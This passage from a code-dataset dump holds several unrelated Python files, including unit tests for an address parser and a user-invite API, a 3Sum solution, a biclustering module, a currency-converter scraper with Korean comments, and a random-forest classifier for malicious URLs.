username[n], name[n])\n apply_test.process()\n # 判断是否需要下一审批(是否有下一审批选择界面)\n result = apply_test.is_need_next_process(name[n+1])\n self.assertTrue(result != -1, \"测试不通过\")\n if result:\n return 0\n\n def tearDown(self):\n print(\"结束测试\\n\")\n sleep(2)\n self.driver.quit()\n\nif __name__ == '__main__':\n unittest.main()\n # unittest.TestLoader().loadTestsFromTestCase('TestLeave')\n # unittest.TextTestRunner.run()","sub_path":"old2/test_business_new2.py","file_name":"test_business_new2.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"345221060","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport twaddress\n\n\n@unittest.skip('Just skip...')\nclass CutTest(unittest.TestCase):\n def test_short_address(self):\n expect = ['高雄市', '三民區', '建工路', '415號']\n self.assertEqual(twaddress.cut('高雄市三民區建工路415號'), expect)\n\n def test_normal_address(self):\n expect = ['高雄市', '前鎮區', '成功二路', '25號', '5樓之1']\n self.assertEqual(twaddress.cut('高雄市前鎮區成功二路25號5樓之1'), expect)\n\n def test_hard_address(self):\n expect = []\n self.assertEqual(twaddress.cut('嘉義市溪興街153巷12弄25號5樓3室'), expect)\n\n def test_sections_numbers(self):\n expect = ('114', 'Neihu Dist., Taipei City', 'Sec. 1, Neihu Rd.', '', {'巷': '', '弄': '', '號': '306', '樓': '', '室': ''})\n cut_result = twaddress.cut('台北市內湖區內湖路1段306號')\n print(cut_result)\n self.assertEqual(cut_result, expect)\n\n\nclass GetTest(unittest.TestCase):\n def test_hard_address(self):\n expect = ('50F-60, No.30, Aly. 20, Ln. 10, Qixian 1st Rd., '\n 'Xinxing Dist., Kaohsiung City 800, Taiwan (R.O.C.)')\n self.assertEqual(twaddress.get('高雄市新興區七賢一路10巷20弄30號50樓之60'), expect)\n\n def test_sections_numbers(self):\n expect = \"No.306, Sec. 1, Neihu Rd., Neihu Dist., Taipei City 114, Taiwan (R.O.C.)\"\n get_result_1 = twaddress.get(\"台北市內湖區內湖路1段306號\")\n get_result_2 = twaddress.get(\"台北市內湖區內湖路一段306號\")\n self.assertEqual(get_result_1, expect)\n self.assertEqual(get_result_2, expect)\n\n def test_village_addresses(self):\n str_1 = \"桃園市桃園區建國里桃鶯路85號1樓\"\n str_2 = \"台南市鹽水區義稠里義稠65之1號1樓\"\n get_result_1 = twaddress.get(str_1)\n get_result_2 = twaddress.get(str_2)\n self.assertEqual(\n get_result_1,\n \"1F, No.85, Taoying Rd., Jianguo Vil., Taoyuan Dist., Taoyuan City 330, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n self.assertEqual(\n get_result_2,\n \"65-1F, No.1, Yichou, Yichou Vil., Yanshui Dist., Tainan City 737, Taiwan (R.O.C.)\",\n msg=f\"Origianl string={str_2}\")\n\n def test_discard_neighborhood(self):\n str_1 = \"桃園市中壢區興南里一鄰中美路一段51號2樓\"\n get_result_1 = twaddress.get(str_1)\n self.assertEqual(\n get_result_1,\n \"2F, No.51, Sec. 1, Zhongmei Rd., Xingnan Vil., Zhongli Dist., Taoyuan City 320, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n\n def test_parenthesis(self):\n str_1 = \"新北市板橋區成功路6巷7號2樓(現場僅供辦公室使用)\"\n get_result_1 = twaddress.get(str_1)\n self.assertEqual(\n get_result_1,\n \"2F, No.7, Ln. 6, Chenggong Rd., Banqiao Dist., New Taipei City 220, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n\n def test_sub_numbers(self):\n str_1 = \"新北市板橋區中山路二段330之2號11樓\"\n get_results_1 = twaddress.get(str_1)\n self.assertEqual(\n get_results_1,\n \"11F, No.330-2, Sec. 2, Zhongshan Rd., Banqiao Dist., New Taipei City 220, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\"\n )","sub_path":"test/test_cut.py","file_name":"test_cut.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"562714440","text":"import json\nimport random\nimport uuid\n\nfrom faker import Factory\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom api_user.models import User, Profile\nfrom api_admin.utils.user_auth import authentication, UserFactory, ProfileFactory\n\nfaker = Factory.create()\n\n\nclass InviteListUserTesting(APITestCase):\n\n def setUp(self):\n self.uuid_cus = uuid.uuid1(random.randint(0, 2 ** 48 - 1))\n self.admin = UserFactory()\n self.profile = ProfileFactory(user=self.admin)\n self.client.credentials(HTTP_AUTHORIZATION=authentication(self.admin))\n self.url = '/api/v1/admin/invite_list_user/'\n\n def test_invite_list_user_with_all_email_valid(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan@paradox.ai', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 2)\n self.assertEqual(len(response_data['invalid_user']), 0)\n self.assertEqual(User.objects.count(), 2)\n self.assertEqual(Profile.objects.count(), 2)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_invite_list_user_with_all_email_invalide(self):\n user = UserFactory(email='luan@paradox.ai', staff=False)\n profile = ProfileFactory(user=user)\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 0)\n self.assertEqual(len(response_data['invalid_user']), 2)\n self.assertEqual(User.objects.count(), 0)\n self.assertEqual(Profile.objects.count(), 0)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_with_one_email_valid_one_email_invalid(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 1)\n self.assertEqual(response_data['valid_user'][0].get('email'), data[0].get('email'))\n self.assertEqual(len(response_data['invalid_user']), 1)\n self.assertEqual(response_data['invalid_user'][0].get('email'), data[1].get('email'))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_with_email_duplicate(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 1)\n self.assertEqual(len(response_data['invalid_user']), 2)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n","sub_path":"src/api_admin/tests/invite_list_user.py","file_name":"invite_list_user.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"508181988","text":"# https://leetcode.com/problems/3sum/description/\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n # check if length is long enough\n if len(nums)<3:\n return []\n\n # create a occurrence dict for the counts\n occurrences = dict()\n results = []\n for num in nums:\n if num not in occurrences:\n occurrences[num] = 1\n else:\n occurrences[num] += 1\n\n # check for [0,0,0] case\n if 0 in occurrences and occurrences[0] >= 3 :\n results.append([0,0,0])\n\n # used for duplicates\n result_tuple_set = set()\n\n # iterate through positive number pairs, negative number pairs and pos-negative number pairs\n pos,neg = set(),set()\n for num in nums:\n if num > 0:\n pos.add(num)\n elif num < 0:\n neg.add(num)\n\n for p1 in pos:\n for p2 in pos - set([p1]):\n if (-p1-p2) in occurrences:\n if tuple(sorted([p1,p2,-p1-p2])) not in result_tuple_set:\n result_tuple_set.add(tuple(sorted([p1,p2,-p1-p2])))\n results.append([p1,p2,-p1-p2])\n\n for n1 in neg:\n for n2 in neg - set([n1]):\n if -(n1+n2) in occurrences:\n if tuple(sorted([n1,n2,-n1-n2])) not in result_tuple_set:\n result_tuple_set.add(tuple(sorted([n1,n2,-n1-n2])))\n results.append([n1,n2,-n1-n2])\n for p1 in pos:\n for n1 in neg:\n if -(p1+n1) in occurrences:\n if -(p1+n1) == p1 and occurrences[p1] < 2:\n continue\n elif -(p1+n1) == n1 and occurrences[n1] < 2:\n continue\n\n if tuple(sorted([n1,p1,-(p1+n1)])) not in result_tuple_set:\n results.append([p1,n1,-p1-n1])\n\n return results\n\n\ns = Solution()\n# a = [-4,-2,-2,-2,0,1,2,2,2,3,3,4,4,6,6]\n# print(s.threeSum([1,1,-2]))\n\n\n","sub_path":"leetcode/3 3Sum.py","file_name":"3 3Sum.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"228246900","text":"#!/usr/bin/env python3\n\n# Workflow 9, Tissue-to-Tissue Bicluster\n\nimport asyncio\nimport concurrent.futures\nimport urllib.request\nfrom collections import defaultdict\nfrom json import JSONDecodeError\n\nimport fire\nimport pandas as pd\nimport requests\n\nfrom biolink.model import AnatomicalEntityToAnatomicalEntityAssociation, AnatomicalEntity\n\nfrom ncats.translator.core.module_payload import Payload\nfrom ncats.translator.core.data_transfer_model import ModuleMetaData, ConceptSpace\n\nbicluster_gene_url = 'https://bicluster.renci.org/RNAseqDB_bicluster_gene_to_tissue_v3_gene/'\nbicluster_bicluster_url = 'https://bicluster.renci.org/RNAseqDB_bicluster_gene_to_tissue_v3_bicluster/'\n\nrelated_biclusters_and_genes_for_each_input_gene = defaultdict(dict)\n\n\nclass BiclusterByTissueToTissue():\n\n def __init__(self):\n pass\n\n def get_ID_list(self, ID_list_url):\n with urllib.request.urlopen(ID_list_url) as url:\n ID_list = url.read().decode().split('\\n')\n return ID_list\n\n def curated_ID_list(self, ID_list):\n curated_ID_list = []\n for ID in ID_list:\n if not ID: # there was an empty ('') string in the input list of genes, we ignore those.\n continue\n else:\n ID = ID.split(None, 1)[0]\n ID = ID.lower()\n curated_ID_list.append(ID)\n return curated_ID_list\n\n def run_getinput(self, ID_list_url):\n ID_list = self.get_ID_list(ID_list_url)\n curated_ID_list = self.curated_ID_list(ID_list)\n return curated_ID_list\n\n ### !!! this is the non-async version of the code... it works but it is slow. kept for reference. !!!\n @DeprecationWarning\n def find_related_biclusters(self, curated_ID_list):\n # this function is an artifact... a way to understand 'find_related_biclusters_async', below\n for gene in curated_ID_list:\n request_1_url = bicluster_gene_url + gene + '/'\n response = requests.get(request_1_url)\n response_json = response.json()\n cooccurrence_dict_each_gene = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'] = defaultdict(dict)\n cooccurrence_dict_each_gene['number_of_related_biclusters'] = len(response_json)\n for x in response_json:\n bicluster_dict = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'][x['bicluster']] = []\n for related_bicluster in cooccurrence_dict_each_gene['related_biclusters']:\n request_2_url = bicluster_bicluster_url + related_bicluster + '/'\n response_2 = requests.get(request_2_url)\n response_2_json = response_2.json()\n gene_in_each_bicluster_list = [bicluster['gene'] for bicluster in response_2_json]\n cooccurrence_dict_each_gene['related_biclusters'][related_bicluster] = gene_in_each_bicluster_list\n related_biclusters_and_genes_for_each_input_gene[gene] = dict(cooccurrence_dict_each_gene)\n return related_biclusters_and_genes_for_each_input_gene\n\n async def tissue_to_tissue_biclusters_async(self, curated_ID_list):\n bicluster_url_list = [bicluster_gene_url + gene + '/' + '?include_similar=true' for gene in curated_ID_list]\n length_bicluster_url_list = len(bicluster_url_list)\n with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor_1:\n loop_1 = asyncio.get_event_loop()\n futures_1 = [loop_1.run_in_executor(executor_1, requests.get, request_1_url) for request_1_url in\n bicluster_url_list]\n for response in await asyncio.gather(*futures_1):\n cooccurrence_dict_each_gene = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'] = defaultdict(dict)\n\n try:\n response_json = response.json()\n except JSONDecodeError:\n continue\n\n 
length_response_json = len(response_json)\n cooccurrence_dict_each_gene['number_of_related_biclusters'] = length_response_json\n if length_response_json > 0:\n gene = response_json[0]['gene']\n for x in response_json:\n bicluster = x['bicluster']\n cooccurrence_dict_each_gene['related_biclusters'][x['bicluster']] = []\n related_biclusters = [x for x in cooccurrence_dict_each_gene['related_biclusters']]\n bicluster_bicluster_url_list = [bicluster_bicluster_url + related_bicluster + '/' for\n related_bicluster in related_biclusters]\n with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor_2:\n\n loop_2 = asyncio.get_event_loop()\n futures_2 = [loop_2.run_in_executor(executor_2, requests.get, request_2_url) for request_2_url\n in bicluster_bicluster_url_list]\n for response_2 in await asyncio.gather(*futures_2):\n response_2_json = response_2.json()\n genes_in_each_bicluster = [bicluster['gene'] for bicluster in response_2_json]\n biclusterindex = [x['bicluster'] for x in response_2_json]\n cooccurrence_dict_each_gene['related_biclusters'][\n biclusterindex[0]] = genes_in_each_bicluster\n related_biclusters_and_genes_for_each_input_gene[gene] = dict(cooccurrence_dict_each_gene)\n return related_biclusters_and_genes_for_each_input_gene\n\n # the function below returns a dictionary listing all biclusters which occur in the input with a count of how many times each bicluster occurs\n def bicluster_occurences_dict(self, related_biclusters_and_genes_for_each_input_gene):\n bicluster_occurences_dict = defaultdict(dict)\n for key, value in related_biclusters_and_genes_for_each_input_gene.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n if bicluster_occurences_dict[key]:\n bicluster_occurences_dict[key] += 1\n else:\n bicluster_occurences_dict[key] = 1\n return bicluster_occurences_dict\n\n def unique_biclusters(self, bicluster_occurences_dict):\n list_of_unique_biclusters = []\n for key, value in bicluster_occurences_dict.items():\n if value == 1:\n list_of_unique_biclusters.append(key)\n return list_of_unique_biclusters\n\n # the method below lends itself to async ... 
reprogram it\n def genes_in_unique_biclusters(self, list_of_unique_biclusters, related_biclusters_and_genes_for_each_input_gene):\n dict_of_genes_in_unique_biclusters = defaultdict(dict)\n for key, value in related_biclusters_and_genes_for_each_input_gene.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n dict_of_genes_in_unique_biclusters[key] = []\n if key in list_of_unique_biclusters:\n dict_of_genes_in_unique_biclusters[key].append(value)\n return dict_of_genes_in_unique_biclusters\n\n def genes_in_unique_biclusters_not_in_input_gene_list(self, curated_ID_list, dict_of_genes_in_unique_biclusters):\n dict_of_genes_in_unique_biclusters_not_in_inputs = defaultdict(dict)\n for key, value in dict_of_genes_in_unique_biclusters.items():\n if value:\n for gene in value[0]:\n if gene in curated_ID_list:\n continue\n if not dict_of_genes_in_unique_biclusters_not_in_inputs[gene]:\n dict_of_genes_in_unique_biclusters_not_in_inputs[gene] = 1\n else:\n dict_of_genes_in_unique_biclusters_not_in_inputs[gene] += 1\n return dict_of_genes_in_unique_biclusters_not_in_inputs\n\n def sorted_list_of_output_genes(self, dict_of_genes_in_unique_biclusters_not_in_inputs):\n sorted_list_of_output_genes = sorted(\n (value, key) for (key, value) in dict_of_genes_in_unique_biclusters_not_in_inputs.items())\n sorted_list_of_output_genes.reverse()\n return sorted_list_of_output_genes\n\n def ids_in_unique_biclusters(self, list_of_unique_biclusters, related_biclusters_and_ids_for_each_input_id):\n dict_of_ids_in_unique_biclusters = defaultdict(dict)\n for key, value in related_biclusters_and_ids_for_each_input_id.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n dict_of_ids_in_unique_biclusters[key] = []\n if key in list_of_unique_biclusters:\n dict_of_ids_in_unique_biclusters[key].append(value)\n return dict_of_ids_in_unique_biclusters\n\n def ids_in_unique_biclusters_not_in_input_ID_list(self, curated_ID_list, dict_of_ids_in_unique_biclusters):\n dict_of_ids_in_unique_biclusters_not_in_inputs = defaultdict(dict)\n for key, value in dict_of_ids_in_unique_biclusters.items():\n if value:\n for ID in value[0]:\n # try inserting a split fcn here and basically making a dictionary where every gene gets split and counted, etc, idk...\n if ID in curated_ID_list:\n continue\n if not dict_of_ids_in_unique_biclusters_not_in_inputs[ID]:\n dict_of_ids_in_unique_biclusters_not_in_inputs[ID] = 1\n else:\n dict_of_ids_in_unique_biclusters_not_in_inputs[ID] += 1\n return dict_of_ids_in_unique_biclusters_not_in_inputs\n\n\nclass TissueToTissueBicluster(Payload):\n\n def __init__(self, input_tissues=None):\n\n super(TissueToTissueBicluster, self).__init__(module=BiclusterByTissueToTissue())\n\n if not input_tissues:\n raise RuntimeError(\"TissueToTissueBicluster ERROR: missing mandatory input_tissues parameter\")\n\n input_tissue_ids = self.get_simple_input_identifier_list(input_tissues)\n\n most_common_tissues = asyncio.run(self.module.tissue_to_tissue_biclusters_async(input_tissue_ids))\n\n self.results = pd.DataFrame.from_records(most_common_tissues, columns=[\"hit_id\", \"score\"])\n\n\nTissueToTissueBicluster.set_metadata(\n ModuleMetaData(\n name=\"Mod9A - Tissue-to-Tissue Bicluster\",\n source='RNAseqDB Biclustering',\n association=AnatomicalEntityToAnatomicalEntityAssociation,\n domain=ConceptSpace(AnatomicalEntity, ['UBERON']),\n relationship='related_to',\n range=ConceptSpace(AnatomicalEntity, 
['UBERON']),\n )\n )\n\n\ndef metadata():\n \"\"\"\n Retrieve Module Metadata\n \"\"\"\n return TissueToTissueBicluster.get_metadata()\n\n\ndef main():\n fire.Fire(TissueToTissueBicluster)\n\n\nif __name__ == '__main__':\n main()","sub_path":"ncats/translator/modules/anatomical_entity/anatomical_entity/tissue_to_tissue_bicluster.py","file_name":"tissue_to_tissue_bicluster.py","file_ext":"py","file_size_in_byte":11428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"272248344","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"clear\")\n\n\ncode_url = \"https://www.iban.com/currency-codes\"\ncurrency_url = \"https://transferwise.com/gb/currency-converter/\"\n\n\ncountries = []\n\ncodes_request = requests.get(code_url)\ncodes_soup = BeautifulSoup(codes_request.text, \"html.parser\")\n\ntable = codes_soup.find(\"table\")\nrows = table.find_all(\"tr\")[1:]\n\nfor row in rows:\n items = row.find_all(\"td\")\n name = items[0].text\n code =items[2].text\n if name and code:\n if name != \"No universal currency\":\n country = {\n 'name':name.capitalize(),\n 'code': code\n }\n countries.append(country)\n\n\ndef ask_country(text):\n print(text)\n try:\n choice = int(input(\"#: \"))\n if choice >= len(countries) or choice < 0:\n print(\"Choose a number from the list.\")\n return ask_country(text)\n else:\n print(f\"{countries[choice]['name']}\")\n return countries[choice]\n except ValueError:\n print(\"That wasn't a number.\")\n return ask_country(text)\n\n\ndef ask_amount(a_country, b_country):\n try:\n print(f\"\\nHow many {a_country['code']} do you want to convert to {b_country['code']}?\")\n amount = int(input())\n return amount\n except ValueError:\n print(\"That wasn't a number.\")\n return ask_amount(a_country, b_country)\n \n\n\nprint(\"Welcome to CurrencyConvert PRO 2000\\n\")\nfor index, country in enumerate(countries):\n print(f\"#{index} {country['name']}\")\n\nuser_country = ask_country(\"\\nWhere are you from? Choose a country by number.\\n\")\ntarget_country = ask_country(\"\\nNow choose another country.\\n\")\n\n\namount = ask_amount(user_country, target_country)\n\nfrom_code = user_country['code']\nto_code = target_country['code']\n\ncurrency_request = requests.get(f\"{currency_url}{from_code}-to-{to_code}-rate?amount={amount}\")\ncurrency_soup = BeautifulSoup(currency_request.text, \"html.parser\")\nrate = currency_soup.find(\"span\", {\"class\":\"text-success\"}).get_text()\nif rate:\n result = float(rate) * amount\n amount = format_currency(amount, from_code, locale=\"ko_KR\")\n result = format_currency(result, to_code, locale=\"ko_KR\")\n print(f\"{amount} is {result}\")\n\n# ask_country(text) 함수 (Line 34 ~ 46)\n# 지난 시간에 완성했던 ask() 함수와 거의 비슷하나 43번째 줄에서 countries[choice] 값을 리턴해주는 부분이 추가되었습니다.\n# user_country, target_country 값 구하기 (Line 64 ~ 65)\n# ask_country(text) 함수를 불러와 사용자가 고른 나라의 이름과 통화 코드를 저장 시켜줍니다.\n# user_country, target_country 모두 같은 방식으로 동작합니다.\n# amount 값 구하기 (Line 68)\n# 사용자가 얼마만큼의 돈을 환전할지 알아내야 합니다.\n# 그러기 위해선 ask_amount 함수를 작성하여 인자 값으로 user_country, target_country 를 보내야합니다.\n# ask_amount(a_country, b_country) 함수 (Line 49 ~ 56)\n# 사용자가 선택한 두 나라의 정보를 인자 값으로 받아왔습니다.\n# 두 나라의 정보는 오로지 사용자에게 질문을 던지는 출력문에만 쓰입니다.\n# amount = int(input()) 을 사용하여 사용자에게 환전할 돈의 양을 묻습니다.\n# 돈은 숫자이므로 반드시 int() 로 감싸서 형변환 시켜줍니다.\n# 그리고 amount 값을 리턴 시켜줍니다.\n# 사용자가 만약 숫자가 아닌 문자를 입력했을 경우를 대비하여 try-except문을 사용하여 예외처리를 해줍니다.\n# 사용자가 선택한 두 나라의 통화 코드(from_code, to_code) 가져오기 (Line 70 ~ 71)\n# 2번에서 구한 user_country, target_country 값을 이용하여 간단히 통화 코드를 가져올 수 있습니다.\n# 각각의 새로운 변수에 user_country['code'] , target_country['code'] 를 넣어주시면 오로지 통화 코드만 저장되는 것을 볼 수 있습니다.\n# 홈페이지에서 환전 결과를 가져오기 (Line 73 ~ 80)\n# 스크래핑을 하기에 앞서, requests 라이브러리를 이용하여 Transfer Wise 홈페이지에 HTTP 요청을 보내야합니다.\n# 사용자로부터 입력을 받은 정보들을 URL에 포맷팅하여 GET 방식으로 HTTP 요청을 아래와 같은 코드로 보냅니다.\n# currency_request = requests.get(f\"{currency_url}{from_code}-to-{to_code}-rate?amount={amount}\")\n# beautifulSoup 라이브러리를 사용하여 해당 홈페이지의 html 코드들을 
가져옵니다.\n# 위의 사진은 환전 결과 값을 가져오기 위해 크롬 개발자 도구에서 inspect한 결과입니다.\n# 홈페이지의 코드 변경으로 인해 환전 결과의 value 값을 가져올 수 없습니다.\n# 그러므로 환전 결과 값을 가져오는 것이 아니라 다른 방법으로 접근하여야 됩니다.\n# 홈페이지 하단에 보시면 1 COP = 0.30937 KRW 이라는 값이 있는데 초록색 글씨로 되어있는 0.30937 을 긁어와서 amount 값이랑 곱해주는 것으로 환전 결과 값을 얻을 수 있습니다.\n# 저 초록색 값을 가져오기 위해 rate = currency_soup.find(\"span\", {\"class\":\"text-success\"}).get_text() 이라는 코드를 작성해줍니다.\n# 혹시 rate 값이 존재하지 않을 경우도 생각하여 if rate: 를 사용하여 rate 값이 존재할 때만 환전 값을 구하도록 코드를 작성합니다.\n# 위에서 구한 rate 값을 float 형식으로 변환한 다음 amount 값이랑 곱하여 환전 값을 구하기 위해 아래와 같이 작성합니다.\n# result = float(rate) * amount\n# 마지막으로 환전할 돈의 양(amount) , 환전 결과(result) 를 format_currency() 를 이용하여 통화 형식으로 포맷 시켜줍니다.\n# 결론\n# 홈페이지의 코드 변경으로 인해 환전 결과 값을 바로 가져올 수 없게 되어 다른 방법을 생각해서 해결해야 되는 챌린지였습니다.\n# 같은 홈페이지여도 시간이 지남에 따라 html코드가 변경 되는 경우가 꽤 있으므로 주의하여야 합니다.\n","sub_path":"~08.01까지/nadocoding/6일자정답해설.py","file_name":"6일자정답해설.py","file_ext":"py","file_size_in_byte":5985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"68581549","text":"# Program to find the factorial of a given number with recursion\n\n# To check or set recursion limit beyond 1000, we need to import sys. Default is 1000\nimport sys\n\n# Change or set the recursion limit\nsys.setrecursionlimit(2000)\n# Printing the current recursion limit\nprint(\"The current recursion limit is: \", sys.getrecursionlimit())\n\n\nresult = 1\n\n\ndef factorial_with_recursion(n):\n # A global variable can be accessed and can't be modified inside a function, so that's why we have to declare\n # using global keyword to modify that variable\n global result\n\n if n == 0:\n result = 1\n else:\n result = n * factorial_with_recursion(n - 1)\n\n return result\n\n\nfinal_result = factorial_with_recursion(int(input(\"Enter the factorial to calculate: \")))\n\nprint(final_result)\n\n\n","sub_path":"Factorial/Factorial using recursion.py","file_name":"Factorial using recursion.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"146393602","text":"#!/usr/bin/python3\n\n\nclass WrappingPaperCounter:\n total_size = 0 # type: int\n\n def reset(self):\n self.total_size = 0\n\n def consume(self, present_dimensions: str):\n (l, w, h) = [int(dim) for dim in present_dimensions.split('x')]\n lw = l * w # type: int\n lh = l * h # type: int\n wh = w * h # type: int\n self.total_size += 2 * lw + 2 * lh + 2 * wh + min(lw, lh, wh)\n\n\ndef should_quit(command):\n return command in [\"quit\", \"q\"]\n\n\nif __name__ == \"__main__\":\n input_file = \"\" # type: str\n wrapping_paper_counter = WrappingPaperCounter()\n while not should_quit(input_file):\n input_file = input(\"input_file: \") # type: str\n if not should_quit(input_file):\n wrapping_paper_counter.reset()\n with open(input_file) as file:\n present_sizes = file.readlines()\n for present_size in present_sizes:\n wrapping_paper_counter.consume(present_size)\n print(\"We need {} square feet of wrapping paper\".format(wrapping_paper_counter.total_size))\n print(\"It's over, you can go outside and play now\")\n","sub_path":"src/main/python/2_wrap_battle.py","file_name":"2_wrap_battle.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"290572827","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import interp\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom mlxtend.plotting import plot_confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\nimport pickle\nfrom names import names\n\nforest_saved_file = 'forestPredictor.sav'\nfeature_mask = 'featuresMask.csv'\nroc_file = 'ROC_plot_RForest.png'\nconfusion_matrix_file = 'confusion_matrix_plot_RForest.png'\n\ndata_csv = pd.read_csv('dropped.csv', delimiter='|', names=names, header=0)\n\n# print(train_data_csv.head(5))\n\nforest = RandomForestClassifier()\n\n# convert class to binary (0, 1) from benign, malicious\nlb = LabelBinarizer()\ndata_csv['class'] = lb.fit_transform(data_csv['class'].values)\nprint(data_csv.groupby(['class']).size())\n\n# drop the URL column\ndata_csv.drop(columns=['url'], axis=1, inplace=True)\narray = data_csv.values\n\n# load Y with the classes, making sure they are of int type\nY = array[:, -1]\nY = Y.astype(int)\n\n# drop the Class column\ndata_csv.drop(columns=['class'], axis=1, inplace=True)\narray = data_csv.values\n\n# load X with the features\nX = array[:, 0: -1]\n\n# set up for 10 fold cross validation\nsplits = 10\nkf = KFold(n_splits=splits)\nkf.get_n_splits(X, Y)\n\nsummation = 0\n\n# build empty 2x2 matrix\nmatrix_sum = [2, 2]\n\ntprs = []\naucs = []\nmean_fpr = np.linspace(0, 1, 100)\ni = 0\n\nfor train_index, test_index in kf.split(X, Y):\n X_train, X_test = X[train_index], X[test_index]\n Y_train, Y_test = Y[train_index], Y[test_index]\n forest.fit(X_train, Y_train)\n prediction = forest.predict(X_test)\n # print(classification_report(Y_test, prediction))\n matrix = confusion_matrix(Y_test, prediction)\n matrix_sum = matrix_sum + matrix\n summation += accuracy_score(Y_test, prediction)\n\n # Compute ROC curve\n probas_ = forest.fit(X[train_index], Y[train_index]).predict_proba(X[test_index])\n fpr, tpr, thresholds = roc_curve(Y[test_index], probas_[:, 1])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n plt.plot(fpr, tpr, lw=1, alpha=0.3,\n label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\n i += 1\n\nprint(\"Confusion Matrix\")\nprint(matrix_sum)\n\n# break out the True Positive, False Positive, False Negative and True Negative from the matrix\nTP = matrix_sum[0][0]\nFP = matrix_sum[0][1]\nFN = matrix_sum[1][0]\nTN = matrix_sum[1][1]\n\nprint(\"True Positive --- \" + str(TP))\nprint(\"False Positive ---\" + str(FP))\nprint(\"True Negative --- \" + str(TN))\nprint(\"False Negative ---\" + str(FN))\n\noverall_accuracy = format((TP + TN) / (TP + TN + FP + FN) * 100, '.2f')\ntrue_positive_rate = format(TP / (TP + FN) * 100, '.2f')\ntrue_negative_rate = format(TN / (TN + FP) * 100, '.2f')\nfalse_positive_rate = format(FP / (TN + FP) * 100, '.2f')\nfalse_negative_rate = format(FN / (FN + TP) * 100, '.2f')\nprecision = format(TP / (TP + FP) * 100, '.2f')\n\n\n# average accuracy of the model\naverage = (summation / splits) * 100\naverage = format(average, '.2f')\n\n\nprint(\"Average Accuracy of model: \" + average + '%')\nprint(\"Overall Accuracy: \" + overall_accuracy + '%')\nprint(\"True Positive Rate: \" + true_positive_rate + '%')\nprint(\"True Negative Rate: \" + true_negative_rate + 
